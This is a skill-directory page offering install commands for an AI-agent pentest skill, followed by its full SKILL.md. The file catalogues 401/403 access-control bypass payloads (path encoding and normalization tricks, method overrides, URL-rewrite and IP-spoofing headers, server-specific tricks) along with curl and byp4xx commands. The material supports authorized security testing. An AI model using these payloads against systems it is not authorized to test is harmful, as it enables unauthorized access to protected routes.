mTLS Configuration
wshobson/agents
Walks through mutual TLS between services in a zero-trust setup: certificate hierarchy, rotation, a gradual PERMISSIVE-to-STRICT rollout and handshake debugging.
A skill your agent uses when protected HTTP routes return 401 or 403.
$ npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a claude-codeProject install by default; add -g for ~/.claude/skills/.
$ gh skill install uphiago/recon-skills 401-403-bypass-techniques --agent claude-codeProject scope by default; add --scope user for a personal install. Needs GitHub CLI 2.90.0 or later (public preview).
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .claude/skills && cp -r skills-src/recon/401-403-bypass .claude/skills/401-403-bypass-techniques && rm -rf skills-srcUse ~/.claude/skills/ instead of .claude/skills for a personal install. The folder must contain SKILL.md.
Claude Code skills documentation · loads skills from .claude/skills/
Install the "401-403-bypass-techniques" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/401-403-bypass into .claude/skills/401-403-bypass-techniques/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "401-403-bypass-techniques", then confirm the skill loads.Claude Code copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$skill-installer install https://github.com/uphiago/recon-skills/tree/main/recon/401-403-bypassType this inside Codex. $skill-installer <name> installs a curated skill from openai/skills. The installer writes to $CODEX_HOME/skills (default ~/.codex/skills). Restart Codex if the skill does not show up.
$ npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a codexProject install goes to .agents/skills/; add -g for ~/.codex/skills/.
$ gh skill install uphiago/recon-skills 401-403-bypass-techniques --agent codexProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .agents/skills && cp -r skills-src/recon/401-403-bypass .agents/skills/401-403-bypass-techniques && rm -rf skills-srcUse ~/.agents/skills/ instead of .agents/skills for a personal install.
Codex skills documentation · loads skills from .agents/skills/
Install the "401-403-bypass-techniques" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/401-403-bypass into .agents/skills/401-403-bypass-techniques/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "401-403-bypass-techniques", then confirm the skill loads.Codex copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a cursorProject install goes to .agents/skills/; add -g for ~/.cursor/skills/.
$ gh skill install uphiago/recon-skills 401-403-bypass-techniques --agent cursorProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .cursor/skills && cp -r skills-src/recon/401-403-bypass .cursor/skills/401-403-bypass-techniques && rm -rf skills-srcUse ~/.cursor/skills/ instead of .cursor/skills for a personal install.
Cursor skills documentation · loads skills from .cursor/skills/, .agents/skills/, .claude/skills/, .codex/skills/
Install the "401-403-bypass-techniques" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/401-403-bypass into .cursor/skills/401-403-bypass-techniques/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "401-403-bypass-techniques", then confirm the skill loads.Cursor copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gemini skills install https://github.com/uphiago/recon-skills.git --path recon/401-403-bypass--scope user (default) or --scope workspace; --path is the subfolder of the repo that holds the skill; --consent skips the security confirmation prompt.
$ npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a gemini-cliProject install goes to .agents/skills/; add -g for ~/.gemini/skills/.
$ gh skill install uphiago/recon-skills 401-403-bypass-techniques --agent gemini-cliProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .gemini/skills && cp -r skills-src/recon/401-403-bypass .gemini/skills/401-403-bypass-techniques && rm -rf skills-srcUse ~/.gemini/skills/ instead of .gemini/skills for a personal install, then run /skills reload.
Gemini CLI skills documentation · loads skills from .gemini/skills/, .agents/skills/
Install the "401-403-bypass-techniques" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/401-403-bypass into .gemini/skills/401-403-bypass-techniques/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "401-403-bypass-techniques", then confirm the skill loads.Gemini CLI copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ gh skill install uphiago/recon-skills 401-403-bypass-techniquesInstalls for Copilot at project scope by default; add --scope user for a personal install. Preview a skill first with gh skill preview. Needs GitHub CLI 2.90.0 or later (public preview).
$ npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a github-copilotProject install goes to .agents/skills/; add -g for ~/.copilot/skills/.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .github/skills && cp -r skills-src/recon/401-403-bypass .github/skills/401-403-bypass-techniques && rm -rf skills-srcUse ~/.copilot/skills/ instead of .github/skills for a personal install. Commit .github/skills so cloud agent and code review can use it.
GitHub Copilot skills documentation · loads skills from .github/skills/, .claude/skills/, .agents/skills/
Install the "401-403-bypass-techniques" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/401-403-bypass into .github/skills/401-403-bypass-techniques/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "401-403-bypass-techniques", then confirm the skill loads.GitHub Copilot copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
$ npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a opencodeOpenCode documents no install command of its own. Project install goes to .agents/skills/; add -g for ~/.config/opencode/skills/.
$ gh skill install uphiago/recon-skills 401-403-bypass-techniques --agent opencodeProject scope by default (.agents/skills/); add --scope user for a personal install.
$ git clone --depth 1 https://github.com/uphiago/recon-skills.git skills-src && mkdir -p .opencode/skills && cp -r skills-src/recon/401-403-bypass .opencode/skills/401-403-bypass-techniques && rm -rf skills-srcUse ~/.config/opencode/skills/ instead of .opencode/skills for a personal install.
OpenCode skills documentation · loads skills from .opencode/skills/, .claude/skills/, .agents/skills/
Install the "401-403-bypass-techniques" agent skill from https://github.com/uphiago/recon-skills/tree/main/recon/401-403-bypass into .opencode/skills/401-403-bypass-techniques/ in this project. Copy the whole folder (SKILL.md and every file beside it), keep the folder name "401-403-bypass-techniques", then confirm the skill loads.OpenCode copies the folder itself, the same result as the manual copy. Check what it changed before you commit it.
401-403-bypass-techniquesA skill your agent uses when protected HTTP routes return 401 or 403.
401 403 Bypass Techniques is an agent skill from uphiago/recon-skills. Use when protected HTTP routes return 401 or 403.
Its SKILL.md is about 3.1k tokens, which your agent loads only when the skill is triggered. It is a single SKILL.md file with no bundled scripts. Compatibility notes: Requires curl; byp4xx is optional.
It sits in Security, covering Cloud networking. The repository describes itself as: Recon & pentest skill pack. CORS, XSS, SQLi, SSRF, RCE, WordPress, MCP, cloud, subdomain takeover, and more. Field-tested. MIT. Full write-up at hiago.sh. The licence is MIT.
8 steps, taken from the step headings in SKILL.md.
Read from SKILL.md and the folder at commit 1260244. It shows what the files ask for, not the result of running them.
Pre-approves nothing: there is no allowed-tools line, so your agent's usual permission prompts apply.
From allowed-tools in the SKILL.md frontmatter.
Shell commands in SKILL.md call:
curlFrom the folder's file list and the shell code blocks in SKILL.md.
No URLs in SKILL.md. Its commands use curl, which can reach the network depending on how they are called.
From URLs in SKILL.md, links to its own repository left out.
Names no API keys, tokens, secrets or passwords.
From names ending in _API_KEY, _TOKEN, _SECRET, _KEY or _PASSWORD in SKILL.md.
Requires curl; byp4xx is optional.
From compatibility in the SKILL.md frontmatter.
401 403 Bypass Techniques loads about 3.1k tokens when it runs. Until then it costs about 19 tokens; SKILL.md has 667 words of instructions outside code blocks.
Estimates: characters ÷ 4, the usual rule of thumb; real counts depend on the model's tokenizer. Scripts and assets cost tokens only if the agent reads them.
The automated check found no risky patterns in SKILL.md.
Automated static check — not a guarantee. Review scripts before installing. It scans the text of SKILL.md for risky patterns (piping downloads into a shell, reading credential files, hidden Unicode, destructive commands); files beside SKILL.md are not scanned.
The full file from uphiago/recon-skills at commit 1260244, republished under its MIT licence (© uphiago). 667 words, ~3,110 tokens.
.claude/skills/401-403-bypass-techniques/SKILL.md (or your agent's skills folder).A bypass candidate appears when two HTTP-processing layers (CDN, reverse proxy, web server, framework) decide differently about the same request. The useful signal is a change in routing or protected content, not a status code alone.
401 Unauthorized or 403 Forbidden.curl --path-as-is or Burp Repeater.byp4xx, dirsearch, feroxbuster, Burp Intruder, nghttp, nc.TARGET="https://target.example"
PATH_DENIED="/admin"
OUTDIR="${OUTPUT_DIR:-./output}/401-403"
mkdir -p "$OUTDIR"
# Denied baseline: record status, headers, and body for comparison.
curl -sS --path-as-is --max-time 10 \
-D "$OUTDIR/baseline.headers" -o "$OUTDIR/baseline.body" \
-w 'status=%{http_code} bytes=%{size_download} redirect=%{redirect_url}\n' \
"$TARGET$PATH_DENIED"
# Compare candidates against the baseline.
curl -sS --path-as-is --max-time 10 -i "$TARGET/./${PATH_DENIED#/}"
curl -sS --path-as-is --max-time 10 -i -X OPTIONS "$TARGET$PATH_DENIED"
curl -sS --path-as-is --max-time 10 -i -H 'X-Forwarded-For: 127.0.0.1' "$TARGET$PATH_DENIED"For each candidate, compare status, Location, body length, title, and a
protected-content marker against the baseline.
The core idea: the reverse proxy/WAF checks one path format, but the backend
normalizes differently. The ✓ marks request forms that commonly reach the
backend through a different route; a 200 alone is not proof of access (see
Verification).
/admin → 403
/admin/ → 200 ✓ (trailing slash)
/admin/. → 200 ✓ (trailing dot)/admin → 403
/Admin → 200 ✓
/ADMIN → 200 ✓
/aDmIn → 200 ✓Works when: proxy rule is case-sensitive but backend is case-insensitive (common on Windows/IIS).
/admin → 403
/%61dmin → 200 ✓ (encode 'a')
/admi%6e → 200 ✓ (encode 'n')
/%61%64%6d%69%6e → 200 ✓ (full encode)/admin → 403
/%2561dmin → 200 ✓ (%25 = %, decoded twice: %61 → a)
/admin%252f → 200 ✓
/admin..%252f → 200 ✓/admin → 403
/admi%C0%AE → 200 ✓ (overlong UTF-8 for '.')
/admi%C0%6E → 200 ✓ (overlong UTF-8 for 'n')
/%C0%AFadmin → 200 ✓ (overlong UTF-8 for '/')Modern UTF-8 decoders reject overlong forms; these target legacy parsers and mixed decoding chains.
/admin → 403
/./admin → 200 ✓
//admin → 200 ✓
/admin/./ → 200 ✓
/.//admin → 200 ✓
/admin..;/ → 200 ✓ (Tomcat path parameter)/admin → 403
/admin%00 → 200 ✓
/admin%00.json → 200 ✓
/%00/admin → 200 ✓Relevant to older native modules; modern managed runtimes usually reject embedded NUL bytes.
/admin → 403
/admin;foo=bar → 200 ✓ (Tomcat/Java treats ; as path param)
/admin; → 200 ✓
/admin;x → 200 ✓/admin%20 (space) /admin%09 (tab) /admin? (empty query)
/admin.json /admin.html /admin/~/admin\ /admin\..\/ \..\admin///admin/// /./admin/./ /admin/..;/admin (Tomcat) /%2e/adminGET /admin → 403
POST /admin → 200 ✓
PUT /admin → 200 ✓
PATCH /admin → 200 ✓
DELETE /admin → 200 ✓
OPTIONS /admin → 200 ✓ (may leak allowed methods)
TRACE /admin → 200 ✓ (may reflect headers — XST)
HEAD /admin → 200 ✓ (bodyless response; does not by itself confirm access to the protected body)When the proxy blocks by method, but the backend reads override headers:
GET /admin HTTP/1.1
X-HTTP-Method-Override: PUT
GET /admin HTTP/1.1
X-Method-Override: POST
GET /admin HTTP/1.1
X-HTTP-Method: DELETE
POST /admin HTTP/1.1
X-HTTP-Method-Override: PATCH
_method=PUT (in POST body — Rails, Laravel)FOOBAR /admin HTTP/1.1 → some ACLs only check GET/POST
GETS /admin HTTP/1.1 → typo-like methods may bypass
CONNECT /admin HTTP/1.1 → proxy may tunnel
PROPFIND /admin HTTP/1.1 → WebDAV method
MOVE /admin HTTP/1.1 → WebDAV methodThese headers tell the backend the "real" URL, bypassing proxy-level path checks:
GET / HTTP/1.1
X-Original-URL: /admin
GET / HTTP/1.1
X-Rewrite-URL: /adminThe proxy sees GET / (allowed), but the backend routes to /admin.
Headers to try (each with values 127.0.0.1, 10.0.0.1, 0.0.0.0, ::1):
X-Forwarded-For | X-Real-IP | X-Originating-IP | X-Remote-IP
X-Remote-Addr | X-Client-IP | True-Client-IP | Cluster-Client-IP
X-ProxyUser-IP | X-Custom-IP-Authorization | Forwarded: for=127.0.0.1IP encoding variants: 0177.0.0.1 (octal), 2130706433 (decimal),
0x7f000001 (hex), localhost
Referer: https://target.com/admin # Referrer check bypass
Origin: https://target.com # Origin check bypass
Host: localhost # Host header manipulation
X-Forwarded-Host: localhost # Forwarded host
Content-Type: application/json # Content-type switch
X-Requested-With: XMLHttpRequest # AJAX flag# HTTP/1.0 (some ACLs only apply to HTTP/1.1)
GET /admin HTTP/1.0
# HTTP/0.9 (extremely legacy — no headers)
GET /admin
# HTTP/2 pseudo-header tricks
:method: GET
:path: /admin
:authority: target.com
# See the hunt-http-smuggling skill for H2-specific bypasses, including h2c upgrade.Combine multiple techniques for higher success rate:
POST / HTTP/1.1 # method override + URL rewrite
X-Original-URL: /admin
X-HTTP-Method-Override: GET
GET /%61dmin HTTP/1.1 # IP spoof + path encoding
X-Forwarded-For: 127.0.0.1
GET /Admin HTTP/1.0 # protocol + case + IP spoof
X-Forwarded-For: 127.0.0.1| Server | Key Tricks |
|---|---|
| Apache | /admin/ (trailing slash), /.admin (dot prefix), /admin%0d (CR) |
| Nginx | /Admin (case), /admin../ (normalization), X-Original-URL: /admin |
| IIS/ASP.NET | /admin;.css (path param+ext), /admin\ (backslash), /admin::$DATA (ADS), /admin%20 |
| Tomcat/Java | /admin;foo (path param), /admin..;/ (traversal), /;/admin (empty param) |
| Spring | /admin.anything (suffix matching, older), /admin/ (trailing slash) |
| Tool | Purpose | URL |
|---|---|---|
| byp4xx | Comprehensive 403 bypass scanner | github.com/lobuhi/byp4xx |
| dirsearch | Directory brute-force with encoding variants | github.com/maurosoria/dirsearch |
| feroxbuster | Recursive content discovery | github.com/epi052/feroxbuster |
| Burp Intruder | Custom payload lists for manual testing | portswigger.net |
# Basic usage: attempts path, method, header, and protocol variants.
byp4xx -m 10 --rate 5 -xD "https://target.com/admin"
# Output shows all attempted bypasses and their response codes.
# Treat 200/301/302 rows as candidates; confirm each against the baseline.Got 401 or 403 on a path?
│
├── Try PATH MANIPULATION first (highest success rate)
│ ├── /path/ (trailing slash)
│ ├── /PATH (case change)
│ ├── /path%20 (trailing space)
│ ├── /./path (dot segment)
│ ├── //path (double slash)
│ ├── /path;x (path parameter — Java/Tomcat)
│ ├── /path..;/ (Tomcat specific)
│ ├── /%2e/path (encoded dot)
│ ├── /path%00 (null byte)
│ ├── /path%23 (encoded hash)
│ └── Result? → status/body differ from baseline = candidate
│
├── Path tricks failed → Try METHOD BYPASS
│ ├── POST/PUT/PATCH/DELETE/OPTIONS
│ ├── HEAD (bodyless GET — verify body access separately)
│ ├── X-HTTP-Method-Override: PUT
│ └── TRACE (may reflect auth headers — XST)
│
├── Method tricks failed → Try HEADER BYPASS
│ ├── X-Original-URL: /path (reverse proxy/IIS rewrite)
│ ├── X-Rewrite-URL: /path (same concept)
│ ├── X-Forwarded-For: 127.0.0.1 (IP whitelist)
│ ├── X-Real-IP: 127.0.0.1
│ ├── True-Client-IP: 127.0.0.1
│ └── Referer: https://target.com/path
│
├── Header tricks failed → Try PROTOCOL BYPASS
│ ├── HTTP/1.0 instead of 1.1
│ ├── HTTP/2 h2c smuggling (hunt-http-smuggling)
│ └── WebSocket upgrade
│
├── Single techniques failed → Try COMBINATIONS
│ ├── Method + Path: POST /PATH/
│ ├── Header + Path: X-Forwarded-For + /path%20
│ ├── All three: POST + X-Original-URL + IP headers
│ └── Protocol + Path: HTTP/1.0 + encoded path
│
├── All bypasses failed → Consider ALTERNATIVE APPROACHES
│ ├── Request smuggling (hunt-http-smuggling) → smuggle past ACL
│ ├── SSRF (hunt-ssrf) → access from server
│ ├── IDOR (hunt-idor) → access data directly
│ └── Auth flaws (hunt-auth-bypass) → login bypass
│
└── Automated scan with byp4xx for completeness# Top 10 quick-wins (try these first)
GET /admin/ HTTP/1.1 # trailing slash
GET /Admin HTTP/1.1 # case change
GET /admin%20 HTTP/1.1 # trailing space
GET /./admin HTTP/1.1 # dot segment
GET //admin HTTP/1.1 # double slash
POST /admin HTTP/1.1 # method change
GET / HTTP/1.1 # X-Original-URL bypass
X-Original-URL: /admin
GET /admin HTTP/1.1 # IP whitelist bypass
X-Forwarded-For: 127.0.0.1
GET /admin;.css HTTP/1.1 # IIS path param
GET /admin..;/ HTTP/1.1 # Tomcat bypass200 may be a login page, generic error, WAF challenge, SPA shell, or cached public response.301/302 may only redirect to authentication; inspect Location and the destination body.HEAD has no body; OPTIONS and TRACE expose method behavior, not the protected content.--path-as-is.// and dot-segments before any check runs, so a candidate can hit the wire as the plain baseline path; confirm the raw request target (Burp Repeater shows what was actually sent).Location, WWW-Authenticate, Allow, cache and content-type headers, title, body length, and protected-content markers.© uphiago, MIT. Rendered from Markdown: HTML in the file is shown as text, images as links, and headings moved down two levels. Raw file
Just SKILL.md in recon/401-403-bypass of uphiago/recon-skills.
Open the folder on GitHubat commit 1260244
401 403 Bypass Techniques next to the 5 skills that share the most tags, products or categories with it. Stars are the repository's; “used in” counts other GitHub owners with a copy.
| Skill | Stars | Used in | Tokens | Auto-check | Licence | Repo updated |
|---|---|---|---|---|---|---|
| 401 403 Bypass Techniques this skilluphiago/recon-skills | 1.3k | — | ~3.1k | Automated safety check: Pass | MIT | |
| mTLS Configurationwshobson/agents | 40k | 9 repos | ~588 | Automated safety check: Pass | MIT | |
| Implementing Next Generation Firewall With Palo Altomukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~3.1k | Automated safety check: Pass | Apache-2.0 | |
| Analyzing Tls Certificate Transparency Logsmukul975/Anthropic-Cybersecurity-Skills | 34k | — | ~745 | Automated safety check: Pass | Apache-2.0 | |
| Implementing Tlsancoleman/ai-design-components | 525 | — | ~3.6k | Automated safety check: Notes | MIT | |
| External Enumerationforefy/.context | 152 | — | ~3.1k | Automated safety check: Pass | MIT |
wshobson/agents
Walks through mutual TLS between services in a zero-trust setup: certificate hierarchy, rotation, a gradual PERMISSIVE-to-STRICT rollout and handshake debugging.
mukul975/Anthropic-Cybersecurity-Skills
Configures and deploys Palo Alto Networks next-generation firewalls end-to-end, covering App-ID application-aware policies, User-ID identity-based enforcement, zone-based security rules, SSL…
mukul975/Anthropic-Cybersecurity-Skills
Queries Certificate Transparency logs via crt.sh and pycrtsh to detect phishing domains, unauthorized certificate issuance, and shadow IT.
ancoleman/ai-design-components
Configure TLS certificates and encryption for secure communications.
forefy/.context
Passively map a company's domains, subdomains, DNS ownership, tech stack, and CDNs.
mukul975/Anthropic-Cybersecurity-Skills
Detect and respond to Adversary-in-the-Middle (AiTM) phishing attacks that use reverse proxy kits like EvilProxy, Evilginx, and Tycoon 2FA to bypass MFA and steal session tokens, correlating Azure…
uphiago/recon-skills
Flags API endpoints whose data or actions look like they should need a login but currently don't, as part of authorized security testing.
uphiago/recon-skills
Mine errorlog for creds, paths, SQL when leak hunt finds. An agent skill from uphiago/recon-skills.
uphiago/recon-skills
Analyze JS bundles and source maps for hardcoded secrets, API keys, JWTs, and internal endpoints
uphiago/recon-skills
A skill your agent uses when starting or restructuring an authorized external web and API assessment.
uphiago/recon-skills
Sensitive file scanning, path traversal bypass, vHost enum, .env extract, log mining, Varnish detect
uphiago/recon-skills
Map organization IP infrastructure via ASN, CIDR, TLD expansion, and reverse DNS.
Categories
A skill your agent uses when protected HTTP routes return 401 or 403. 401 403 Bypass Techniques is an agent skill from uphiago/recon-skills. Use when protected HTTP routes return 401 or 403.
401 403 Bypass Techniques fits situations like: protected HTTP routes return 401; tasks that involve Cloud networking.
Run `npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a claude-code`. Or copy the skill folder (recon/401-403-bypass in uphiago/recon-skills) into .claude/skills/401-403-bypass-techniques in your project. Claude Code loads it when a task matches its description.
Run `npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a codex`. Or copy the skill folder (recon/401-403-bypass in uphiago/recon-skills) into .agents/skills/401-403-bypass-techniques in your project. Codex loads it when a task matches its description.
Cursor, Gemini CLI, GitHub Copilot and OpenCode also load SKILL.md folders. With the skills CLI, run `npx skills add uphiago/recon-skills --skill 401-403-bypass-techniques -a cursor` (or -a gemini-cli, github-copilot or opencode for the others). To copy it by hand, put the folder in .cursor/skills/401-403-bypass-techniques, .gemini/skills/401-403-bypass-techniques, .github/skills/401-403-bypass-techniques and .opencode/skills/401-403-bypass-techniques in your project.
Going by SKILL.md and its folder, 401 403 Bypass Techniques needs the command-line tools its instructions call (curl). Compatibility (from SKILL.md): Requires curl; byp4xx is optional..
SKILL.md contains no URLs. Its commands use curl, which can reach the network depending on how they are called. This is read from the text; nothing was executed.
Our automated static check of SKILL.md found no risky patterns, such as piping downloads into a shell, reading credential files or hidden Unicode. It is not a guarantee. Review the folder before installing.
401 403 Bypass Techniques is published under the MIT licence (declared in SKILL.md). It allows redistribution, so the full SKILL.md is shown on this page.
About 3.1k tokens (SKILL.md is roughly 12k characters). Agents keep only the skill's name and description in context until a task matches; then they load SKILL.md in full.
Skills that share tags, products or a category with 401 403 Bypass Techniques: mTLS Configuration (wshobson/agents, 40k stars), Implementing Next Generation Firewall With Palo Alto (mukul975/Anthropic-Cybersecurity-Skills, 34k stars), Analyzing Tls Certificate Transparency Logs (mukul975/Anthropic-Cybersecurity-Skills, 34k stars) and Implementing Tls (ancoleman/ai-design-components, 525 stars). The comparison table on this page puts their stars, adoption, token cost, safety result and licence side by side.
uphiago (a GitHub user) maintains it in uphiago/recon-skills, which has 1,293 GitHub stars. The repository holds 23 skills in this directory. The repository was last updated on September 1, 2026.
Source: uphiago/recon-skills on GitHub. Facts on this page come from the repository at the commit we read; the author's words are quoted as theirs.